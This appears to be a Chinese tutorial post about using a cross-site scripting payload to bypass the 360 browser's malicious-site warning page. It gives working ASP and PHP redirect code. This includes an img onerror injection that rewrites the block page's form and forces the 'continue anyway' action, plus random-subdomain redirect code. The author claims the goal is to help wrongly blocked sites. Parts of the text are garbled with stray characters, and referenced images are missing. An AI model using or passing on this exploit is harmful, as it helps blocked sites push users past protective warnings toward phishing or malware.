如何利用xss绕过360网盾做防360拦截空间！详解

1、未解除之前的状态 ：

2、code 区域<%Dim ua ua = Request.ServerVariables("HTTP_USER_AGENT")If (Instr(ua, "Windows NT 5.1") = 0 or Instr(ua, "毙囊Windows NT 6.1") = 0)  and Instr(ua, "MSIE")>0 Then '除了 xp win7 以外的系统Response.Redirect("index1.asp")elseResponse.Redirect("index2.asp")End IF%>

3、index1.asp内容：

code 区新哄域<% dim url y=""""url = "http://www.已被拦截域名.com/?<img/onerror="& y &"document.title='';document.getElementById('safemon').action='http://www.已被拦截域名.com/?';document.getElementsByTagName('div')[0].innerHTML='';forceOpenUrl();"& y &"src=0>"  response.redirect url%>这里目的可以看下拦截页面源码//忽略警告，继续访问function forceOpenUrl() { if(warn_from=='se6'){        external.AppCmd(external.GetSID(window),"sesafe","safebrowsing_openurl", ucode,"", function(i1,s1){})        location.href = jump;                                              return;        }else{     document.getElementById("safemon").submit(); }} function closeWindow(){    window.opener=null;    window.open('','_self');    window.close(); }

4、z7y.php内容：

code 区域<?phpfunction randomkeys($length){ $pattern='1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLOMNOPQRSTUVWXYZ'; for($i=0;$i<$length;$i++) {   $key .= $pattern{mt_rand(0,35)};    //php随机数 } return $key;}header('HTTP/1.1 404');ob_start();phpinfo();$url="http://".randomkeys(5).".xxxx.info/"; $list1=$_GET["/l?"]; $rurl=$url.$list1."";header("location: $rurl");ob_end_clean();?>

5、修复后艺况施：

6、我做这个演示，并不是让做非法网站的站长钻空子，而是希望帮助到一部分被误拦截的站长而伤透脑筋有这个方法可行，如果还有什么专业问题不能解决，代码不明白，可以问我